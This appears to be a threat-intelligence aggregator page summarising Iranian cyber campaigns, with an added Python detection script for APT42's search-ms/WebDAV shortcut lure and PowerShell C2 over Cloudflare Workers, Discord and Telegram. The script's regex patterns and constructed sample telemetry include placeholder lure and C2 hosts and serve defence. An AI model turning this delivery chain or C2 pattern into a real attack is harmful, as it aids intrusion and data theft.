
Iranian Cyber Threat Activity Against U.S. Critical Infrastructure and Kinetic Targeting

5 unique sources, 13 articles

Summary

Iranian state-sponsored and affiliated cyber threat actors are actively escalating retaliatory campaigns following joint Israeli-US military strikes on February 28, 2026, with Google’s Threat Intelligence Group (GTIG) warning of imminent, aggressive cyber-attacks against a broadened target set. While Iran’s digital infrastructure remains severely disrupted (internet connectivity at ~4% of normal), over 150 hacktivist incidents—DDoS attacks, defacements, and unverified breach claims—were recorded within 48 hours, targeting government, banking, aviation, and telecom sectors globally. The UK’s NCSC has now issued an urgent advisory for organizations with Middle East exposure to review cybersecurity postures, warning that Iranian actors maintain operational capability despite the blackout and may exploit supply chains or regional offices as attack vectors. Prior to this surge, Iranian actors conducted long-term espionage and destructive campaigns, including the use of ‘wiper’ malware, spear-phishing against global embassies, and cyber-enabled kinetic targeting—such as maritime AIS reconnaissance to facilitate missile strikes. Groups like APT42, Subtle Snail (UNC1549), and Imperial Kitten deployed tailored malware (e.g., MINIBIKE, TAMECAT) to infiltrate telecommunications, aerospace, and defense sectors, while MuddyWater accessed live CCTV streams for real-time attack planning. U.S. agencies, including CISA, continue to urge critical infrastructure operators to implement multi-factor authentication, maintain offline backups, and report incidents promptly, as Iran’s tactics evolve to combine ransomware-as-a-smokescreen, destructive wipers, and multi-actor obfuscation.

Timeline

  1. 02.03.2026 17:00 3 articles · 12h ago

    Iran Launches Massive Cyber Retaliation After Military Strikes

    Following joint Israeli-US strikes on Iranian leadership, military, and nuclear sites on February 28, 2026, Iran’s digital infrastructure suffered catastrophic disruption, with internet connectivity collapsing to ~4% of normal levels. The outage crippled government services, official media, energy, and aviation sectors, coinciding with retaliatory missile/drone attacks on Israeli and U.S. regional targets. Between February 28–March 1, over 150 hacktivist incidents—including DDoS attacks, website defacements, and unverified data breach claims—were recorded, targeting government, banking, aviation, and telecom sectors globally. Google’s Threat Intelligence Group (GTIG) warns of an imminent expansion of Iranian cyber retaliation, predicting aggressive attacks against GCC nations (Qatar, Bahrain, Jordan, UAE, Kuwait) hosting US military bases, as well as broader global targets. The UK’s NCSC has now issued an advisory confirming that Iranian state and Iran-linked cyber actors retain operational capability despite the blackout, urging organizations with Middle East exposure to review cybersecurity postures, increase monitoring, and prepare for potential DDoS, phishing, and ICS-targeting attacks. Security experts assess that Iran will leverage its established playbook—ransomware-as-a-smokescreen, destructive wipers, and multi-actor obfuscation—while prioritizing victims in regions with lower cyber resilience.

  2. 20.11.2025 09:35 1 article · 3mo ago

    Iranian Threat Actors Use Cyber Reconnaissance for Kinetic Attacks

    Iranian threat actors, including Imperial Kitten and MuddyWater, have been conducting cyber reconnaissance to facilitate physical attacks. Imperial Kitten targeted maritime vessels, gaining access to CCTV cameras and AIS data, which was used to plan a missile strike. MuddyWater accessed live CCTV streams in Jerusalem to gather real-time visual intelligence. These activities highlight the integration of cyber and physical attack methods by nation-state actors.

  3. 14.11.2025 16:40 1 article · 3mo ago

    APT42 Launches SpearSpecter Espionage Campaign

    The Iranian state-sponsored threat actor APT42 has been observed targeting individuals and organizations of interest to the IRGC as part of a new espionage-focused campaign codenamed SpearSpecter. The campaign, detected in early September 2025 and assessed to be ongoing, systematically targets high-value senior defense and government officials using personalized social engineering tactics. The campaign extends to the targets' family members, creating a broader attack surface that exerts more pressure on the primary targets. APT42 is known for its ability to mount convincing social engineering campaigns that can run for days or weeks to build trust with the targets before sending a malicious payload or tricking them into clicking on booby-trapped links. The SpearSpecter campaign is carried out by cluster D of APT42, which focuses more on malware-based operations, while another campaign detailed by Check Point was carried out by cluster B of the same group, which focuses more on credential harvesting. The campaign involves impersonating trusted WhatsApp contacts to send a malicious link to a supposed required document for an upcoming meeting or conference. When the link is clicked, it initiates a redirect chain to serve a WebDAV-hosted Windows shortcut (LNK) masquerading as a PDF file by taking advantage of the "search-ms:" protocol handler. The LNK file establishes contact with a Cloudflare Workers subdomain to retrieve a batch script that functions as a loader for TAMECAT, a known PowerShell backdoor. TAMECAT employs various modular components to facilitate data exfiltration and remote control, using HTTPS, Discord, and Telegram for command-and-control (C2). The PowerShell framework uses three distinct channels for C2, suggesting the threat actor's goal of maintaining persistent access to compromised hosts even if one pathway gets detected and blocked. TAMECAT comes equipped with features to conduct reconnaissance, harvest files matching certain extensions, steal data from web browsers like Google Chrome and Microsoft Edge, collect Outlook mailboxes, and take screenshots at 15-second intervals. The data is exfiltrated over HTTPS or FTP, and the malware adopts various stealthy techniques to evade detection and resist analysis efforts.
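    A defender-side detection sketch for the delivery chain just described (search-ms: lure, WebDAV-hosted .pdf.lnk, batch loader, PowerShell backdoor beaconing to Cloudflare Workers, Discord or Telegram), added here as an example and not code from the original page or any of its sources. The event schema (host, parent, image, cmdline, dest), the sample telemetry and the `.invalid` / `workers.dev` placeholder hostnames are constructed assumptions.

```python
"""Detection sketch for the SpearSpecter chain summarised above: search-ms: lure
-> WebDAV-hosted .pdf.lnk -> batch loader -> PowerShell backdoor beaconing to
Cloudflare Workers / Discord / Telegram. Events below are CONSTRUCTED sample
telemetry in an assumed EDR-style schema (host, parent, image, cmdline, dest)."""
import re
from collections import defaultdict

# search-ms: is a legitimate Windows Search URI; the suspicious shape is a
# location crumb pointing at a UNC/WebDAV or http path instead of a local folder.
REMOTE_SEARCH = re.compile(r"search-ms:.*location:\s*(\\\\|https?://)", re.I)
# Document-looking shortcut (e.g. Agenda.pdf.lnk) opened from a WebDAV UNC path.
DOC_LNK = re.compile(r"\.(pdf|docx?|xlsx?)\.lnk\b", re.I)
WEBDAV_PATH = re.compile(r"\\\\[^\\\s\"]+@ssl(@\d+)?\\|\\davwwwroot\\", re.I)
# C2 channels named on the page; workers.dev covers any Cloudflare Workers subdomain.
C2_HOSTS = ("workers.dev", "discord.com", "discordapp.com", "api.telegram.org")

def is_c2_host(dest):
    d = dest.lower()
    return any(d == h or d.endswith("." + h) for h in C2_HOSTS)

RULES = [  # (chain stage, description, predicate over one event)
    ("delivery", "search-ms: URI resolving to a remote location",
     lambda ev: REMOTE_SEARCH.search(ev["cmdline"]) is not None),
    ("execution", "document-named .lnk opened from a WebDAV path",
     lambda ev: DOC_LNK.search(ev["cmdline"]) is not None
     and WEBDAV_PATH.search(ev["cmdline"]) is not None),
    ("c2", "PowerShell connecting to Workers/Discord/Telegram",
     lambda ev: ev["image"].lower() in ("powershell.exe", "pwsh.exe")
     and is_c2_host(ev["dest"])),
]

def analyse(events):
    """Return {host: finding}. Hits in two or more chain stages escalate a host
    to 'high'; an isolated hit stays a 'low' lead for triage."""
    hits = defaultdict(set)
    for ev in events:
        for stage, desc, pred in RULES:
            if pred(ev):
                hits[ev["host"]].add((stage, desc))
    return {host: {"severity": "high" if len({s for s, _ in h}) >= 2 else "low",
                   "stages": sorted({s for s, _ in h}),
                   "rules": sorted(d for _, d in h)}
            for host, h in hits.items()}

# Constructed sample: WS01 shows the full chain, WS02 only benign look-alikes.
SAMPLE_EVENTS = [
    {"host": "WS01", "parent": "msedge.exe", "image": "explorer.exe", "dest": "",
     "cmdline": 'explorer.exe "search-ms:query=Agenda&crumb=location:'
                '\\\\lure-host.invalid@SSL\\DavWWWRoot\\docs"'},
    {"host": "WS01", "parent": "explorer.exe", "image": "cmd.exe", "dest": "",
     "cmdline": 'cmd.exe /c "\\\\lure-host.invalid@SSL\\DavWWWRoot\\docs\\Agenda.pdf.lnk"'},
    {"host": "WS01", "parent": "cmd.exe", "image": "powershell.exe",
     "dest": "stage-placeholder.workers.dev", "cmdline": "powershell.exe -NoProfile"},
    {"host": "WS02", "parent": "explorer.exe", "image": "explorer.exe", "dest": "",
     "cmdline": 'explorer.exe "search-ms:query=budget&crumb=location:C:\\Users\\a\\Docs"'},
    {"host": "WS02", "parent": "explorer.exe", "image": "powershell.exe",
     "dest": "www.microsoft.com", "cmdline": "powershell.exe -File C:\\scripts\\inv.ps1"},
]
```

Running `analyse(SAMPLE_EVENTS)` flags WS01 as high with all three stages and reports nothing for WS02, whose local search-ms: query and PowerShell call to a vendor site are the kind of benign look-alikes the rules are written to ignore.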

  4. 23.09.2025 00:00 2 articles · 5mo ago

    Nimbus Manticore Expands Operations to Western Europe

    The Iran-linked cyber-espionage group Nimbus Manticore, also known as UNC1549 and Smoke Sandstorm, has expanded its operations to target critical infrastructure organizations across Western Europe, including Denmark, Portugal, and Sweden. The group uses sophisticated malware variants, including MiniJunk and MiniBrowse, to gain persistent access to infected systems and steal credentials from Chrome and Edge browsers. MiniJunk is an advanced version of the Minibike backdoor, featuring improved obfuscation techniques, code signing, and multiple C2 servers to evade detection. The malware employs multi-stage sideloading to install and establish persistence on victim systems, leveraging fake job-related login pages and tailored spear-phishing emails. The group's operations are associated with the Iranian Revolutionary Guard Corps (IRGC) and have been active since at least 2022, focusing on the aerospace and defense sectors in Israel and the Middle East. Additionally, UNC1549 (aka Nimbus Manticore or Subtle Snail) has been observed deploying backdoors like TWOSTROKE and DEEPROOT in attacks targeting aerospace, aviation, and defense industries in the Middle East. The group has been active since late 2023 through 2025, employing sophisticated initial access vectors including abuse of third-party relationships, VDI breakouts, and highly targeted phishing. The group combines phishing campaigns with the abuse of trusted relationships with third-party suppliers and partners to gain initial access. UNC1549 abuses credentials associated with services like Citrix, VMware, and Azure Virtual Desktop and Application (VDA) to establish an initial foothold and break out of virtualized sessions. The group targets IT staff and administrators to obtain credentials with elevated privileges for deeper network access. Post-exploitation activities include reconnaissance, credential harvesting, lateral movement, defense evasion, and information theft, focusing on network/IT documentation, intellectual property, and emails. Custom tools used by UNC1549 include MINIBIKE, TWOSTROKE, DEEPROOT, LIGHTRAIL, GHOSTLINE, POLLBLEND, DCSYNCER.SLICK, CRASHPAD, SIGHTGRAB, and TRUSTTRAP. The group uses publicly available programs like AD Explorer, Atelier Web Remote Commander (AWRC), and SCCMVNC for remote control and reconnaissance. UNC1549 maintains stealth and command-and-control (C2) using extensive reverse SSH shells and domains mimicking the victim's industry. The group plants backdoors that beacon silently for months, only activating them to regain access after the victim has attempted eradication.

  5. 19.09.2025 16:59 4 articles · 5mo ago

    Subtle Snail Targets Global Telecommunications and Aerospace Companies


  6. 03.09.2025 13:30 2 articles · 6mo ago

    Iranian Cyber Threat Actors Conduct Global Phishing Campaign

    The first email in this campaign was sent on August 19, 2025, from a legitimate address belonging to the Oman Ministry of Foreign Affairs in Paris, directed back at the organization. The emails were forwarded through a NordVPN exit node in Jordan to mask their origin. The emails included a blurred Word document attachment requiring users to enable macros to view it clearly. The document concealed malicious Visual Basic for Applications (VBA) macros, which, when enabled, executed a payload that gathered basic system information. The campaign targeted around four dozen embassies, consulates, and government ministries from nearly every corner of the earth. The attackers also targeted at least 10 other notable international organizations, including the United Nations, its Office on Drugs and Crime (UNODC), and its Children's Fund (UNICEF); the African Union; and humanitarian organizations like the Order of Malta. The campaign is assessed to have likely concluded just days after it began, as the attackers' command-and-control (C2) infrastructure appears to be inactive.

  7. 30.06.2025 15:00 5 articles · 8mo ago

    U.S. Agencies Warn of Potential Iranian Cyber Activity Against Critical Infrastructure

    Iranian state-sponsored or affiliated cyber threat actors are targeting U.S. industries and government agencies with a rise in malicious cyber activity, including destructive 'wiper' attacks aimed at causing complete network loss. These actors exploit known vulnerabilities, compromise weak passwords, and use tactics like spear phishing, password spraying, and credential stuffing to escalate from account compromise to full network destruction. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is actively monitoring these threats, sharing intelligence with partners, and urging organizations to strengthen basic defenses, such as multi-factor authentication, and report suspected incidents immediately to [email protected]. Following joint Israeli-US strikes on Iran in late February 2026, Iranian cyber retaliation surged, with over 150 hacktivist incidents—including DDoS attacks, defacements, and data breach claims—recorded in 48 hours. Experts warn of escalated Iranian operations leveraging ransomware-as-a-smokescreen, destructive wipers, and multi-actor obfuscation tactics against U.S. and allied networks. The UK NCSC advised organizations with Middle East exposure to review risk postures and secure offline backups, though no direct increase in threats to the UK was observed as of March 2, 2026.

